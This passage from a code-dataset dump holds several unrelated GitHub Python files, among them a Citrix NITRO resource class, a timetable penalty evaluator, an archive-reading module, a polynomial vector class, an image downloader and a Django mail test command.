response, \"ns_gslb_service_response_array\")\n\t\t\tif(result.errorcode != 0) :\n\t\t\t\tif (result.errorcode == 444) :\n\t\t\t\t\tservice.clear_session(self)\n\t\t\t\tresponse = result.ns_gslb_service_response_array\n\t\t\t\ti=0\n\t\t\t\terror = [ns_gslb_service() for _ in range(len(response))]\n\t\t\t\tfor obj in response :\n\t\t\t\t\terror[i]= obj._message\n\t\t\t\t\ti=i+1\n\t\t\t\traise nitro_exception(result.errorcode, str(result.message), error)\n\t\t\tresponse = result.ns_gslb_service_response_array\n\t\t\ti=0\n\t\t\tns_gslb_service_objs = [ns_gslb_service() for _ in range(len(response))]\n\t\t\tfor obj in response :\n\t\t\t\tif hasattr(obj,'_ns_gslb_service'):\n\t\t\t\t\tfor props in obj._ns_gslb_service:\n\t\t\t\t\t\tresult = service.payload_formatter.string_to_bulk_resource(ns_gslb_service_response,self.__class__.__name__,props)\n\t\t\t\t\t\tns_gslb_service_objs[i] = result.ns_gslb_service\n\t\t\t\t\t\ti=i+1\n\t\t\treturn ns_gslb_service_objs\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\t'''\n\tPerforms generic data validation for the operation to be performed\n\t'''\n\tdef validate(self,operationType):\n\t\ttry:\n\t\t\tsuper(ns_gslb_service,self).validate()\n\t\texcept Exception as e :\n\t\t\traise e\n\n'''\nForms the proper response.\n'''\nclass ns_gslb_service_response(base_response):\n\tdef __init__(self,length=1) :\n\t\tself.ns_gslb_service= []\n\t\tself.errorcode = 0 \n\t\tself.message = \"\" \n\t\tself.severity = \"\" \n\t\tself.ns_gslb_service= [ ns_gslb_service() for _ in range(length)]\n'''\nForms the proper response for bulk operation.\n'''\nclass ns_gslb_service_responses(base_response):\n\tdef __init__(self,length=1) :\n\t\tself.ns_gslb_service_response_array = []\n\t\tself.errorcode = 0 \n\t\tself.message = \"\" \n\t\tself.ns_gslb_service_response_array = [ ns_gslb_service() for _ in range(length)]\n","repo_name":"MayankTahil/nitro-ide","sub_path":"mas_nitro-python-1.0/massrc/com/citrix/mas/nitro/resource/config/ns/ns_gslb_service.py","file_name":"ns_gslb_service.py","file_ext":"py","file_size_in_byte":9026,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"12854746490","text":"class EvaluationFunction(object):\n \"\"\"Store evaluation functions\"\"\"\n def __init__(self, data, factory):\n self.data = data\n self.factory = factory\n\n def evaluate(self, timetable):\n \"\"\"Return sum of penalties\"\"\"\n\n penalty = self.countRoomCapacityPenalty(timetable)\n penalty += self.countMinimumWorkingDaysPenalty(timetable)\n penalty += self.countCurriculumCompactnessPenalty(timetable)\n penalty += self.countRoomStabilityPenalty(timetable)\n penalty += self.countConflictsPenalty(timetable)\n penalty += self.countLectureConflictsPenalty(timetable)\n penalty += self.countAvailabilitesPenalty(timetable)\n\n return penalty\n\n def countRoomCapacityPenalty(self, timetable):\n \"\"\"Return sum of penalties for room capacity\"\"\"\n penalty = 0\n for day in range(len(timetable.periods)):\n for period in range(len(timetable.periods[day])):\n for room in self.data.rooms:\n course = timetable.periods[day][period][room.id]\n if course != None:\n if room.capacity < course.studentsNum:\n #print day,period,room.id,course.id\n #print room.capacity, course.studentsNum\n penalty += course.studentsNum - room.capacity\n #print \"Room capacity: \",penalty\n return penalty\n\n def countMinimumWorkingDaysPenalty(self, timetable):\n \"\"\"Return sum of penalties for minimum working days\"\"\"\n penalty = 0\n\n for course in self.data.courses:\n days = set()\n for slot in timetable.courses[course.id]:\n day, _, _ = self.factory.unzip(slot)\n days.add(day)\n\n if len(days) < course.minWorkingDays:\n #print course.id\n penalty += (course.minWorkingDays - len(days)) * 5\n\n #print \"Min working days: \",penalty\n return penalty\n\n def countCurriculumCompactnessPenalty(self, timetable):\n \"\"\"Return sum of penalties for curriculum compactness\"\"\"\n penalty = 0\n for curriculum in self.data.curricula:\n for day in range(len(timetable.periods)):\n for period in range(len(timetable.periods[day])):\n for room in self.data.rooms:\n course = timetable.periods[day][period][room.id]\n if course != None:\n if course.id in curriculum.members:\n ce = course\n before = False\n if period == 0:\n before = False\n else:\n for room in self.data.rooms:\n course = timetable.periods[day][period-1][room.id]\n if course != None:\n if course.id in curriculum.members:\n before = True\n\n after = False\n if period == len(timetable.periods[day]) -1:\n after = False\n else:\n for room in self.data.rooms:\n course = timetable.periods[day][period+1][room.id]\n if course != None:\n if course.id in curriculum.members:\n after = True\n if not before and not after:\n #print day, period, curriculum.id, ce.id\n penalty += 2\n\n\n #for curriculum in self.data.curricula:\n #for day in timetable.periods:\n #print \"Day\"\n #penaltyDay =0\n #prev = False\n #alone = False\n #per = 0\n #for period in day:\n #print \"Day\"\n #for room in period:\n #course = period[room]\n #if course != None:\n #if course.id in curriculum.members:\n #if prev == False or per -1 != prev:\n #penaltyDay += 2\n #alone = True\n #print course.id\n #else:\n #if alone:\n #print \"Del \", course.id\n #penaltyDay -= 2\n #alone = False\n #prev = per\n #per += 1\n #if penaltyDay > 0:\n #penalty += penaltyDay\n\n\n #print \"Curiculum compactness: \",penalty\n return penalty\n\n def countRoomStabilityPenalty(self, timetable):\n \"\"\"Return sum of penalties for room stability\"\"\"\n penalty = 0\n\n for course in self.data.courses:\n rooms = set()\n for slot in timetable.courses[course.id]:\n _, _, room = self.factory.unzip(slot)\n rooms.add(room.id)\n\n if len(rooms) > 1:\n #print course.id\n #print len(rooms)\n penalty += len(rooms) - 1\n\n #print \"Room stability: \",penalty\n return penalty\n\n def countLectureConflictsPenalty(self, timetable):\n \"\"\"Return sum of penalties for lecture conflicts\"\"\"\n penalty = 0\n\n for day in range(len(timetable.periods)):\n for period in range(len(timetable.periods[day])):\n courses = dict()\n for room in self.data.rooms:\n course = timetable.periods[day][period][room.id]\n if course != None:\n courses[course.id] = courses.get(course.id, 0) + 1\n for c in courses:\n if courses[c] > 1:\n #print c\n penalty += courses[c] - 1\n #print \"Lecture Conflicts: \", penalty\n return 1000000 * penalty\n\n def countConflictsPenalty(self, timetable):\n \"\"\"Return sum of penalties for conflicts\"\"\"\n penalty = 0\n\n for day in range(len(timetable.periods)):\n for period in range(len(timetable.periods[day])):\n teachers = dict()\n courses = set()\n for room in self.data.rooms:\n course = timetable.periods[day][period][room.id]\n if course != None:\n if not course.id in courses:\n teachers[course.teacher] = teachers.get(course.teacher, 0) + 1\n #if teachers[course.teacher] > 1:\n #print day, period\n courses.add(course.id)\n\n\n for t in teachers:\n if teachers[t] > 1:\n #print t\n penalty += (teachers[t] * (teachers[t] -1)) / 2\n\n for day in range(len(timetable.periods)):\n for period in range(len(timetable.periods[day])):\n for curriculum in self.data.curricula:\n count = 0\n courses = set()\n for room in self.data.rooms:\n course = timetable.periods[day][period][room.id]\n if course != None:\n if course.id in curriculum.members:\n count += 1\n courses.add(course.id)\n if len(courses) > 1:\n #print day, period\n #print courses\n count = len(courses)\n #print (count * (count -1)) / 2\n penalty += (count * (count -1)) / 2\n #print penalty\n #print \"Conflicts: \", penalty\n return penalty * 1000000\n\n def countAvailabilitesPenalty(self, timetable):\n \"\"\"return sum of penalties for availabilities\"\"\"\n penalty = 0\n\n #print \"Avail\"\n\n for constraint in self.data.constraints:\n day = constraint.day\n period = constraint.dayPeriod\n for room in self.data.rooms:\n course = timetable.periods[day][period][room.id]\n if course != None:\n if course.id == constraint.id:\n #print course.id, day, period\n penalty +=1\n\n #print \"Avail: \", penalty\n return penalty * 1000000\n\n\n","repo_name":"tomecki/cats","sub_path":"cats/pso/evaluationFunction.py","file_name":"evaluationFunction.py","file_ext":"py","file_size_in_byte":8911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10640109671","text":"ROLE_HR = 211\nROLE_EMPLOYEE = 337\nROLE_HOD = 319\nROLE_SUPERUSER = 402\nROLE_ACCOUNTS = 404\nROLE_APPROVAL = 425\nROLE_DUE_HEAD = 426\nROLE_HR_REPORTS = 1345\nROLE_WEB_COORDINATOR = 1346\nROLE_ACHIVEMENT = 1348\nROLE_STUDENT_ACCOUNTS = 1353\nROLE_RND = 1357\nROLE_REGISTRAR = 1358\nROLE_APPRAISAL = 1362\nROLE_REGISTRAR_REPORT = 1368\nROLE_ACADEMIC = 1369\nROLE_DEAN = 1371\nROLE_STUDENT_REPORT = 1372\nROLE_DIRECTOR = 1373\nROLE_REDRESSAL_ADMIN = 1384\nROLE_ADMIN_OFFICER = 1412\nROLE_CHIEF_RECTOR_GIRLS = 1414\nROLE_RECTOR = 1414\nROLE_CHIEF_RECTOR_BOYS = 1413\nROLE_NOTICE_HEAD = 1526\nROLE_LIBRARY_REPORT = 1498\nROLE_ADMIN_APPRAISAL = 1364\nROLE_NOTIFICATION = 1528\nROLE_MARKS_ANALYSIS_CORDINATOR = 1545\n","repo_name":"samyak3009/erp_backend","sub_path":"erp/constants_variables/rolesCheck.py","file_name":"rolesCheck.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29053186642","text":"f = open('./input.txt','r')\ns = f.readlines()\nf.close()\nto_sum = []\n\nfor line in s:\n linearray = line.split()\n linearray = list(map(int, linearray))\n linearray = sorted(linearray,reverse=True)\n i = 1\n lgth = len(linearray)\n for l in linearray:\n to_div = linearray[i:lgth]\n print(linearray)\n print(to_div)\n for d in to_div:\n if l % d == 0:\n to_sum.append(l // d)\n\n i = i + 1 \n\n\nprint(to_sum) \ntotal = 0\nfor num in to_sum:\n total = total + num\n\nprint(total) ","repo_name":"mdanidl/aoc","sub_path":"2017/day-2/script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38029595517","text":"#!/usr/bin/env python3\n\nimport tempfile\nimport shutil\nimport subprocess\nimport json\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nREPO = \"https://github.com/hgn/captcp.git\"\n\n\ndef clone(tmpdir):\n cmd = \"git clone {} {}\".format(REPO, tmpdir)\n w = subprocess.Popen(cmd.split())\n w.wait()\n\ndef tags(tmpdir):\n cmd = 'git -C {} tag'.format(tmpdir)\n result = subprocess.run(cmd.split(), stdout=subprocess.PIPE)\n tags = result.stdout.decode('utf-8').splitlines()\n return sorted(tags)\n\ndef checkout(tmpdir, tag):\n cmd = \"git -C {} checkout {}\".format(tmpdir, tag)\n w = subprocess.Popen(cmd.split())\n w.wait()\n\ndef cloc(tmpdir):\n cmd = 'cloc --json {}'.format(tmpdir)\n result = subprocess.run(cmd.split(), stdout=subprocess.PIPE)\n cloc = result.stdout.decode('utf-8')\n return json.loads(cloc)\n\ndef graph(tags, data):\n dpi = 300\n #plt.figure(figsize=(20,10))\n #plt.figure(num=None, figsize=(80, 60), dpi=200, facecolor='w', edgecolor='k')\n matplotlib.rcParams.update({'font.size': 4})\n plt.figure(figsize=(1200 / dpi, 800 / dpi), dpi=dpi, facecolor='w', edgecolor='k', frameon=False)\n x = list(); y = list(); labels = list()\n for i, tag in enumerate(tags):\n x.append(i)\n y.append(data[tag]['SUM']['code'])\n labels.append(tag)\n plt.plot(x, y)\n plt.xticks(x, labels, rotation='vertical')\n # Pad margins so that markers don't get clipped by the axes\n # Tweak spacing to prevent clipping of tick-labels\n plt.margins(.2)\n plt.subplots_adjust(bottom=0.15)\n plt.ylabel('Lines of Code')\n plt.xlabel('Release')\n plt.savefig('cloc.png', dpi=dpi)\n\n\n\nif __name__ == \"__main__\":\n tmp_dir = \"/tmp/foo\"\n shutil.rmtree(tmp_dir, ignore_errors=True)\n #tmp_dir = tempfile.TemporaryDirectory(delete=False)\n print(tmp_dir)\n clone(tmp_dir)\n tags = tags(tmp_dir)\n data = dict()\n for tag in tags:\n print(tag)\n checkout(tmp_dir, tag)\n data[tag] = cloc(tmp_dir)\n graph(tags, data)\n","repo_name":"hgn/loc-grapher","sub_path":"loc-grapher.py","file_name":"loc-grapher.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"45583293063","text":"import math\n\ndef check(n):\n for i in range (2, int(math.sqrt(n))+1):\n if n % i == 0:\n return False\n return n > 1\n\nfor t in range(int(input())):\n a = int(input())\n k = 0\n for i in range(1, a):\n if math.gcd(i, a) == 1:\n k = k+1\n\n if check(k):\n print(\"YES\")\n else:\n print(\"NO\")\n","repo_name":"ThaiMinhNguyen/Python_PTIT","sub_path":"PY01004.py","file_name":"PY01004.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7780580664","text":"# This module implements the vector of homogenous bivariate polynomial \n# The coefficients can be derived from any scalar class\n\nfrom simple_vectors import Vector\nfrom utils import matrix_rank\n\nclass PolyUnivar(Vector):\n def __init__(self, arr):\n # Initialize the polynomial with coefficients\n if (len(arr) == 0):\n self.coeffs = []\n self.deg = 0\n elif (arr[0] == arr[0].zero()):\n raise Exception(\"The first coefficient of a polynomial cannot be zero\")\n else:\n self.coeffs = arr\n self.deg = len(arr)\n\n def __repr__(self):\n return \"(\" + repr(self.coeffs) + \", \" + repr(self.deg) + \")\"\n\n def __add__(self, other):\n # If the degree of the other is more, swap the two variables\n if (self.deg < other.deg):\n self, other = other, self\n\n offset = self.deg - other.deg\n\n if (self.deg == 0):\n return PolyUnivar([])\n \n # Copy the first self.deg - other.deg coeffs\n result = [self.coeffs[i] for i in range(offset)]\n \n # Add the remaining values\n for i in range(other.deg):\n result.append(other.coeffs[i] + self.coeffs[i + offset])\n\n # Remove leading zeros \n zeroElement = self.coeffs[0].zero()\n ctr = 0\n maxctr = len(result)\n while(ctr < maxctr):\n if (result[ctr] == zeroElement):\n ctr += 1\n else:\n break \n result = result[ctr:]\n\n return PolyUnivar(result)\n\n def __mul__(self, other):\n if (self.deg < other.deg):\n self, other = other, self \n\n if (other.deg == 0):\n if (self.deg == 0):\n return 0\n else:\n return self.coeffs[0].zero()\n\n result = self.coeffs[0].zero()\n offset = self.deg - other.deg\n \n for i in range(other.deg):\n result = result + self.coeffs[i + offset] * other.coeffs[i]\n \n return result \n\n def __rmul__(self, other):\n if (other == other.zero()):\n return PolyUnivar([])\n\n result = []\n\n for i in range(self.deg):\n result.append(other * self.coeffs[i])\n \n return PolyUnivar(result)\n\n def __eq__(self, other):\n return self.coeffs == other.coeffs \n\n def zero(self):\n return PolyUnivar([])\n\n def linearlyIndependent(self, arr):\n m = len(arr)\n\n # The empty set is linearly independent\n if (m == 0):\n return True\n\n # Find the maximal degree and a zero element \n maxDegree = 0\n zeroElement = None\n\n for p in arr:\n maxDegree = max(maxDegree, p.deg)\n if (p.deg > 0 and zeroElement == None):\n zeroElement = p.coeffs[0].zero()\n \n if maxDegree == 0:\n return False\n\n M = [[zeroElement for i in range(maxDegree)] for j in range(m)]\n\n for i in range(m):\n offset = maxDegree - arr[i].deg \n for j in range(offset):\n M[i][j] = zeroElement\n \n for j in range(arr[i].deg):\n M[i][j + offset] = arr[i].coeffs[j]\n\n return matrix_rank(M) == m\n\n # This is polynomial multiplication (not strictly a vector operation)\n def __pow__(self, other):\n if not isinstance(other, PolyUnivar):\n return NotImplemented\n else:\n if (self.deg == 0 or other.deg == 0):\n return PolyUnivar([])\n \n zeroElement = self.coeffs[0].zero()\n res_deg = self.deg + other.deg \n res_coeffs = []\n\n for deg in range(res_deg):\n coeff_value = zeroElement\n for i in range(deg + 1):\n if (i < self.deg and deg - i < other.deg):\n coeff_value += self.coeffs[self.deg - i - 1] * other.coeffs[other.deg - deg + i - 1]\n res_coeffs.append(coeff_value)\n \n res_coeffs.reverse()\n\n # Remove leading zeros \n ctr = 0\n ctr_max = len(res_coeffs)\n\n while(ctr < ctr_max):\n if res_coeffs[ctr] == zeroElement:\n ctr+=1\n else:\n break \n\n res_coeffs = res_coeffs[ctr:]\n \n return PolyUnivar(res_coeffs)\n\n\n","repo_name":"anag004/vspy","sub_path":"poly_univar.py","file_name":"poly_univar.py","file_ext":"py","file_size_in_byte":4418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"10208157615","text":"import os\nimport zipfile\nimport tarfile\ntry:\n import magic\nexcept ImportError:\n magic = None\nimport io\nimport re\nfrom collections.abc import Iterator, Callable\nfrom typeatlas.util import generic_type\n\nSequenceOf = generic_type('Sequence')\nOptional = generic_type('Optional')\n\n\nextension_factories = {}\nmimetype_factories = {}\n\n\ndef get_factory(filename: str=None, fileobj: io.BufferedIOBase=None, *,\n mimetype: str=None) -> type:\n\n \"\"\"Return the archive factory for the given archive type.\"\"\"\n\n if filename is None and (fileobj is None or mimetype is None):\n raise TypeError(\"filename or fileobject with mime required\")\n\n if mimetype is None and filename is not None and magic is not None:\n if fileobj is None or os.access(filename, os.R_OK):\n mimetype = magic.from_file(filename, mime=True)\n\n if mimetype is not None:\n for factory in mimetype_factories.get(mimetype, ()):\n if (fileobj is not None or filename is None or\n factory.is_known_archive(filename)):\n return factory\n\n if filename:\n match = re.search(r'\\.([^\\.]+(?:\\.([^\\.]+))?)$', filename)\n if match is not None:\n for ext in match.groups():\n if ext:\n for factory in extension_factories.get(ext, ()):\n return factory\n\n raise UnknownArchiveFormat(\"%r [%s] has unknown archive format\"\n % (filename or fileobj, mimetype))\n\n\ndef is_known_archive(filename: str, *, mimetype: str=None) -> bool:\n \"\"\"Return true if the file is a known archive.\"\"\"\n if mimetype is None and magic is not None:\n mimetype = magic.from_file(filename, mime=True)\n\n for factory in mimetype_factories.get(mimetype, ()):\n if factory.is_known_archive(filename):\n return True\n\n if filename:\n for ext in re.search(r'\\.([^\\.]+(?:\\.([^\\.]+))?)$', filename).groups():\n if ext:\n for factory in extension_factories.get(ext, ()):\n if factory.is_known_archive(filename):\n return True\n\n return False\n\n\ndef get_archive(filename: str=None, fileobj: io.BufferedIOBase=None, *,\n mimetype: str=None) -> 'Archive':\n\n \"\"\"Return the archive object that can iterate over the files\n archived inside the file.\"\"\"\n\n factory = get_factory(filename, fileobj, mimetype=mimetype)\n return factory(filename, fileobj)\n\n\ndef archive_iterate(filename: str=None, fileobj: io.BufferedIOBase=None, *,\n mimetype: str=None) -> Iterator:\n \"\"\"Iterate over the provided archive filename or object.\"\"\"\n return get_archive(filename, fileobj, mimetype=mimetype).iterate()\n\n\ndef register(extensions: SequenceOf[str]=(), mimetypes: SequenceOf[str]=(),\n compressions: SequenceOf[str]=()) -> Callable:\n \"\"\"Return a decorator registering the given archive type for the\n given extensions and mime types.\"\"\"\n\n def decorator(cls):\n for ext in extensions:\n extension_factories.setdefault(ext, []).append(cls)\n for mime in mimetypes:\n mimetype_factories.setdefault(mime, []).append(cls)\n for mime in compressions:\n mimetype_factories.setdefault(mime, []).append(cls)\n\n cls.extensions = tuple(extensions)\n cls.mimetypes = tuple(mimetypes)\n cls.compressions = tuple(compressions)\n\n return decorator\n\n\nclass Archive:\n\n extensions = ()\n mimetypes = ()\n compressions = ()\n\n def __init__(self, filename: str=None, fileobj: io.BufferedIOBase=None):\n self.filename = filename\n self.fileobj = fileobj\n\n @classmethod\n def is_known_archive(self, filename: str) -> bool:\n \"\"\"Return True if we can read this file with this class.\"\"\"\n if magic is not None:\n return magic.from_file(filename, mime=True) in self.mimetypes\n\n for ext in re.search(r'\\.([^\\.]+(?:\\.([^\\.]+))?)$',\n filename).groups():\n if ext:\n if ext in self.extensions:\n return True\n\n return False\n\n def iterate(self) -> Iterator:\n raise NotImplementedError\n\n def __iter__(self):\n return self.iterate()\n\n def __repr__(self):\n return \"%s(%r, %r)\" % (type(self).__name__,\n self.filename, self.fileobj)\n\n\nclass ArchiveMember:\n\n @property\n def name(self) -> str:\n \"\"\"The name or path of the member.\"\"\"\n raise NotImplementedError\n\n @property\n def size(self) -> Optional[int]:\n \"\"\"The size in bytes of the member.\"\"\"\n raise NotImplementedError\n\n def open(self) -> io.BytesIO:\n \"\"\"Return a bytes file object for reading the archive member.\"\"\"\n raise NotImplementedError\n\n def getdata(self, limit: Optional[int]=16777216) -> bytes:\n \"\"\"Return the data as a bytes object. There is a default zip bomb\n limit in place.\"\"\"\n if limit is None:\n return self.open().read()\n\n if self.size is not None:\n if self.size > limit:\n raise MemberTooBigError(\"%r is larger than zip bomb \"\n \"limit of %d\" % (self, limit))\n\n fileob = self.open()\n result = fileob.read(limit)\n if len(result) >= limit:\n if len(result) > limit or fileob.read(1):\n raise MemberTooBigError(\"%r is larger than zip bomb \"\n \"limit of %d\" % (self, limit))\n\n return result\n\n def isdir(self) -> bool:\n \"\"\"Return True if this is a directory.\"\"\"\n raise NotImplementedError\n\n def isfile(self) -> bool:\n \"\"\"Return True if this is a regular file.\"\"\"\n return not self.isdir()\n\n def isfifo(self) -> bool:\n \"\"\"Return True if this is a named FIFO.\"\"\"\n return False\n\n def isblk(self) -> bool:\n \"\"\"Return True if this is a block device.\"\"\"\n return False\n\n def ischr(self) -> bool:\n \"\"\"Return True if this is a character device.\"\"\"\n return False\n\n def islink(self) -> bool:\n \"\"\"Return True if this is a symlink.\"\"\"\n return False\n\n def issocket(self) -> bool:\n \"\"\"Return True if this is a socket.\"\"\"\n return False\n\n def ishardlink(self) -> bool:\n \"\"\"Return True if this is a hard link.\"\"\"\n return False\n\n def __repr__(self):\n typename = 'unknown'\n try:\n if self.isfile():\n typename = 'file'\n elif self.isdir():\n typename = 'dir'\n elif self.islink():\n typename = 'symlink'\n elif self.ishardlink():\n typename = 'hardlink'\n elif self.isfifo():\n typename = 'FIFO'\n elif self.isblk():\n typename = 'blockdev'\n elif self.ischr():\n typename = 'chardev'\n elif self.issocket():\n typename = 'socket'\n except Exception:\n typename = 'broken'\n\n size = self.size\n if size is None:\n size = '-'\n\n return '<%s %r (%s) [%s] at 0x%x>' % (type(self).__name__, self.name,\n typename, size, id(self))\n\n\nclass ZipMember(ArchiveMember):\n\n def __init__(self, archive: zipfile.ZipFile, member: zipfile.ZipInfo):\n self.archive = archive\n self.member = member\n\n @property\n def name(self) -> str:\n return self.member.filename\n\n @property\n def size(self) -> Optional[int]:\n return self.member.file_size\n\n def isdir(self) -> bool:\n return self.member.is_dir()\n\n def open(self) -> io.BytesIO:\n return self.archive.open(self.member)\n\n\nclass TarMember(ArchiveMember):\n\n def __init__(self, archive: tarfile.TarFile, member: tarfile.TarInfo):\n self.archive = archive\n self.member = member\n\n @property\n def name(self) -> str:\n return self.member.name\n\n @property\n def size(self) -> Optional[int]:\n return self.member.size\n\n def isdir(self) -> bool:\n return self.member.isdir()\n\n def isfile(self) -> bool:\n return self.member.isfile()\n\n def isfifo(self) -> bool:\n return self.member.isfifo()\n\n def isblk(self) -> bool:\n return self.member.isblk()\n\n def ischr(self) -> bool:\n return self.member.ischr()\n\n def islink(self) -> bool:\n return self.member.issym()\n\n def ishardlink(self) -> bool:\n return self.member.islnk()\n\n def open(self) -> io.BytesIO:\n return self.archive.extractfile(self.member)\n\n\n@register(['zip'], ['application/zip'])\nclass ZipArchive(Archive):\n\n def iterate(self) -> Iterator:\n if self.fileobj is None:\n srcfile = self.filename\n else:\n srcfile = self.fileobj\n\n with zipfile.ZipFile(srcfile, 'r') as archive:\n for member in archive.infolist():\n yield ZipMember(archive, member)\n\n\n@register(['tar', 'tar.gz', 'tar.bz2', 'tar.xz', 'tar.lzma'],\n ['application/x-tar'],\n ['application/gzip', 'application/x-gzip',\n 'application/x-bzip2', 'application/x-xz',\n 'application/x-lzma'])\nclass TarArchive(Archive):\n\n @classmethod\n def is_known_archive(self, filename: str) -> bool:\n return tarfile.is_tarfile(filename)\n\n def iterate(self) -> Iterator:\n if self.fileobj is None:\n mode = 'r:*'\n else:\n mode = 'r|*'\n\n with tarfile.open(self.filename, mode, self.fileobj) as archive:\n for member in archive:\n yield TarMember(archive, member)\n\n\nclass ArchiveError(OSError):\n \"\"\"Base exception for archive errors.\"\"\"\n\n\nclass UnknownArchiveFormat(ArchiveError):\n \"\"\"Raised when the archive format is unknown.\"\"\"\n\n\nclass MemberTooBigError(ArchiveError):\n \"\"\"Raised when zip bomb limit was exceeeded.\"\"\"\n\n\nif __name__ == '__main__':\n import traceback, sys, hashlib\n for arg in sys.argv[1:]:\n try:\n for member in archive_iterate(arg):#, open(arg, 'rb'),\n #mimetype=magic.from_file(arg, mime=True)):\n print(member)\n if member.isfile():\n print(' ', hashlib.md5(member.open().read()).hexdigest())\n #print(' ', hashlib.md5(member.open().read()).hexdigest())\n #f = member.open()\n #print(' ', hashlib.md5(f.read()).hexdigest())\n #f.seek(0)\n #print(' ', hashlib.md5(f.read()).hexdigest())\n except Exception:\n traceback.print_exc()\n","repo_name":"milkokr/typeatlas","sub_path":"typeatlas/archiving.py","file_name":"archiving.py","file_ext":"py","file_size_in_byte":10774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38576058261","text":"import os\nimport re\nfrom typing import List\n\nfrom icrawler.builtin import GoogleImageCrawler\n\nfrom consts.path_consts import GOOGLE_IMAGES_RESOURCES_PATH\n\n\nclass GoogleImagesDownloader:\n def __init__(self, images_per_artist: int):\n self._images_per_artist = images_per_artist\n self._invalid_os_chars_regex = re.compile(r'[/:\\\"]')\n self._images_paths = None\n self._remove_images(images_paths=self._get_image_paths())\n\n def download(self, artist: str) -> List[str]:\n try:\n return self._download(artist)\n\n except:\n print('Received exception! returning empty list')\n return []\n\n def _download(self, artist: str) -> List[str]:\n crawler = GoogleImageCrawler(storage={'root_dir': GOOGLE_IMAGES_RESOURCES_PATH})\n crawler.crawl(keyword=f'{artist} musician', max_num=self._images_per_artist)\n self._images_paths = self._get_image_paths()\n\n return self._images_paths\n\n @staticmethod\n def _get_image_paths() -> List[str]:\n images_paths = []\n\n for file in os.listdir(GOOGLE_IMAGES_RESOURCES_PATH):\n file_path = os.path.join(GOOGLE_IMAGES_RESOURCES_PATH, file)\n\n if os.path.isfile(file_path):\n images_paths.append(file_path)\n\n return images_paths\n\n def _remove_images(self, images_paths: List[str], retries_left: int = 3) -> None:\n if retries_left == 0:\n raise PermissionError()\n\n for image_path in images_paths:\n try:\n os.remove(image_path)\n images_paths.remove(image_path)\n\n except PermissionError:\n return self._remove_images(images_paths, retries_left=retries_left-1)\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self._images_paths is None:\n return\n\n self._remove_images(self._images_paths)\n self._images_paths = None\n","repo_name":"nirgodin/RadioStations","sub_path":"data_collection/google_images/google_images_downloader.py","file_name":"google_images_downloader.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"1528025196","text":"from copy import deepcopy\n\n\ndef LUFactorization(iA):\n A = deepcopy(iA)\n n = len(A)\n L = [[0 for i in range(n)] for j in range(n)]\n U = [[0 for i in range(n)] for j in range(n)]\n\n for k in range(0, n-1):\n if A[k][k] == 0:\n return None\n for i in range(k+1, n):\n A[i][k] = A[i][k]/A[k][k]\n for j in range(k+1, n):\n A[i][j] = A[i][j]-A[i][k]*A[k][j]\n\n for i in range(0, n):\n L[i][i] = 1\n for j in range(0, i):\n L[i][j] = A[i][j]\n for j in range(i, n):\n U[i][j] = A[i][j]\n return L, U\n\n\ndef assess(A):\n res = LUFactorization(A)\n if res:\n return f\"L={res[0]}\\nU={res[1]}\"\n return \"无唯一LU分解\"\n\n\nA1 = [\n [1, 2, 2],\n [4, 4, 2],\n [4, 6, 4]\n]\n\n\nA2 = [\n [1, 2, 2],\n [1, 2, 2],\n [4, 6, 4]\n]\n\n\nprint(\"对于A1:\", assess(A1))\nprint(\"对于A2:\", assess(A2))\n","repo_name":"BI1LQV/num-analysis","sub_path":"hw2/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"14476856837","text":"import re\nimport optparse\n\nfrom django.core.management.base import BaseCommand\n\nfrom dbmail.models import MailTemplate\nfrom dbmail.defaults import BACKEND\nfrom dbmail import db_sender\n\n\ndef send_test_msg(pk, email, user=None, **kwargs):\n template = MailTemplate.objects.get(pk=pk)\n slug = template.slug\n var_list = re.findall('\\{\\{\\s?(\\w+)\\s?\\}\\}', template.message)\n context = {}\n for var in var_list:\n context[var] = '%s' % var.upper().replace('_', '-')\n return db_sender(slug, email, user, context, **kwargs)\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument('--email', default='localhost', help='Recipients')\n parser.add_argument('--pk', default=1, help='DBMail template id')\n parser.add_argument('--without-celery',\n action='store_true',\n default=False, dest='celery',\n help='Send direct message')\n parser.add_argument('--provider', help='Provider')\n parser.add_argument('--backend', help='Backend')\n\n @staticmethod\n def get_kwargs(options):\n kwargs = {\n 'use_celery': not options['celery'],\n 'backend': BACKEND['mail']}\n if options['provider']:\n kwargs['provider'] = options['provider']\n if options['backend']:\n kwargs['backend'] = BACKEND[options['backend']]\n return kwargs\n\n def handle(self, *args, **options):\n send_test_msg(\n options['pk'], options['email'], **self.get_kwargs(options)\n )\n print(\"Done. Message was sent.\")\n","repo_name":"LPgenerator/django-db-mailer","sub_path":"dbmail/management/commands/dbmail_test_send.py","file_name":"dbmail_test_send.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":254,"dataset":"github-code","pt":"19"} +{"seq_id":"73343593962","text":"from discord.ui import View\n\nfrom templates.button.buttons import buttons\n\n\nclass ChoseLikeGender(View):\n def __init__(self, user_like_woman, user_like_man):\n super().__init__(timeout=None)\n 